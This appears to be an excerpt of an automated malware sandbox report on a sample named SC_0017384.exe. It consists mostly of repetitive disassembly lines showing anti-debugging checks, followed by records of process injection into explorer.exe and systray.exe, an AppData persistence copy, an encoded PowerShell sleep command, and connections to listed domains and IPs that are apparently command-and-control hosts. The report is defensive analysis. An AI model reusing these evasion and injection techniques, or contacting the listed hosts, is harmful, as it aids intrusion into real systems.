Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_017E51BE mov eax, dword ptr fs:[00000030h] (4 identical entries)
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_017E69A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_017961A0 mov eax, dword ptr fs:[00000030h] (2 identical entries)
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_01792990 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_0178C182 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_0179A185 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_01780050 mov eax, dword ptr fs:[00000030h] (2 identical entries)
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_0179002D mov eax, dword ptr fs:[00000030h] (5 identical entries)
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_0177B02A mov eax, dword ptr fs:[00000030h] (4 identical entries)
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_017E7016 mov eax, dword ptr fs:[00000030h] (3 identical entries)
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_01834015 mov eax, dword ptr fs:[00000030h] (2 identical entries)
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_017658EC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_017FB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_017FB8D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_017FB8D0 mov eax, dword ptr fs:[00000030h] (4 identical entries)
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_0179F0BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_0179F0BF mov eax, dword ptr fs:[00000030h] (2 identical entries)
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_017A90AF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_017920A0 mov eax, dword ptr fs:[00000030h] (6 identical entries)
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_01822073 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_01769080 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_01831074 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_017E3884 mov eax, dword ptr fs:[00000030h] (2 identical entries)
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_0181D380 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_01793B7A mov eax, dword ptr fs:[00000030h] (2 identical entries)
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_0182138A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_0176DB60 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_01835BA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_0176F358 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_0176DB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_0178DBE9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_0182131B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_017903E2 mov eax, dword ptr fs:[00000030h] (6 identical entries)
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_017E53CA mov eax, dword ptr fs:[00000030h] (2 identical entries)
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_01794BAD mov eax, dword ptr fs:[00000030h] (3 identical entries)
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_01838B58 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_0179B390 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_01792397 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_01771B8F mov eax, dword ptr fs:[00000030h] (2 identical entries)
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_017A927A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_017F4257 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_01769240 mov eax, dword ptr fs:[00000030h] (4 identical entries)
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_017A4A2C mov eax, dword ptr fs:[00000030h] (2 identical entries)
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_0176AA16 mov eax, dword ptr fs:[00000030h] (2 identical entries)
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_01783A1C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_01765210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_01765210 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_01765210 mov eax, dword ptr fs:[00000030h] (2 identical entries)
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_01778A0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_0182AA16 mov eax, dword ptr fs:[00000030h] (2 identical entries)
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_01792AE4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_01792ACB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_0177AAB0 mov eax, dword ptr fs:[00000030h] (2 identical entries)
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_0179FAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_017652A5 mov eax, dword ptr fs:[00000030h] (5 identical entries)
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_0182EA55 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_0181B260 mov eax, dword ptr fs:[00000030h] (2 identical entries)
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_01838A62 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_0179D294 mov eax, dword ptr fs:[00000030h] (2 identical entries)
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_0178C577 mov eax, dword ptr fs:[00000030h] (2 identical entries)
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_01787D50 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_018305AC mov eax, dword ptr fs:[00000030h] (2 identical entries)
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_017A3D43 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_017E3540 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_01794D3B mov eax, dword ptr fs:[00000030h] (3 identical entries)
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0176AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017EA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0182FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0182FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0182FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0182FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01818DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0177D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0177D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01838D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0182E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01791DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01791DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01791DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017935A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0179FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0179FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01792581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01792581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01792581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01792581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01762D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01762D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01762D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01762D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01762D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0178746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017FC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017FC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0179A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01838CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0179BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_018214FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01821C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01821C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01821C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01821C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01821C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01821C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01821C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01821C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01821C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01821C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01821C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01821C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01821C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01821C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0183740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0183740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0183740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0177849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0177FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0177EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0179E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01764F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01764F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0178F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017FFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017FFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0179A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0179A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0183070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0183070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01778794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01838F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0178AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0178AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0178AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0178AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0178AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0177766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01830EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01830EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01830EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01777E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01777E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01777E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01777E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01777E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01777E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0181FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01838ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0176E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0179A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0179A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0176C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0176C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0176C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01798E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01821608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017776E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017916E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017936CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0181FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0182AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0182AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017FFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\systray.exeProcess queried: DebugPort
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess queried: DebugPort
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0040CEC3 LdrLoadDll,
          Source: C:\Users\user\Desktop\SC_0017384.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\explorer.exe | Network Connect: 54.85.86.211 80
          Source: C:\Windows\explorer.exe | Domain query: www.myprojoints.com
          Source: C:\Windows\explorer.exe | Network Connect: 172.67.152.24 80
          Source: C:\Windows\explorer.exe | Network Connect: 74.208.236.131 80
          Source: C:\Windows\explorer.exe | Network Connect: 217.160.0.229 80
          Source: C:\Windows\explorer.exe | Domain query: www.metatv.app
          Source: C:\Windows\explorer.exe | Domain query: www.findmyoriginstory.com
          Source: C:\Windows\explorer.exe | Domain query: www.brunaeleandro.com
          Source: C:\Windows\explorer.exe | Domain query: www.madisoncountylincoln.com
          Source: C:\Windows\explorer.exe | Network Connect: 172.67.194.225 80
          Source: C:\Windows\explorer.exe | Domain query: www.emprendizajesocial.com
          Source: C:\Users\user\Desktop\SC_0017384.exe | Section unmapped: C:\Windows\SysWOW64\systray.exe base address: EA0000
          Source: C:\Users\user\Desktop\SC_0017384.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\SC_0017384.exe | Section loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write (2 occurrences)
          Source: C:\Windows\SysWOW64\systray.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\systray.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\SC_0017384.exe | Process created: Base64 decoded start-sleep -seconds 20
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe | Process created: Base64 decoded start-sleep -seconds 20 (2 occurrences)
          Source: C:\Users\user\Desktop\SC_0017384.exe | Process created: Base64 decoded start-sleep -seconds 20
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe | Process created: Base64 decoded start-sleep -seconds 20 (2 occurrences)
          Source: C:\Users\user\Desktop\SC_0017384.exe | Memory written: C:\Users\user\Desktop\SC_0017384.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe | Memory written: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe base: 400000 value starts with: 4D5A (2 occurrences)
          Source: C:\Users\user\Desktop\SC_0017384.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Users\user\Desktop\SC_0017384.exe | Thread register set: target process: 3324
          Source: C:\Windows\SysWOW64\systray.exe | Thread register set: target process: 3324
          Source: C:\Users\user\Desktop\SC_0017384.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
          Source: C:\Users\user\Desktop\SC_0017384.exe | Process created: C:\Users\user\Desktop\SC_0017384.exe C:\Users\user\Desktop\SC_0017384.exe
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe | Process created: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe | Process created: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe
          Source: explorer.exe, 00000004.00000003.535831998.00000000086B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.552222750.00000000086B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.386659068.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.386659068.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.576565553.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: uProgram Manager*r
          Source: explorer.exe, 00000004.00000000.386659068.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.576565553.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.386659068.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.576565553.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
          Source: explorer.exe, 00000004.00000000.386129776.0000000000878000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.575675145.0000000000878000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ProgmanLoc*U
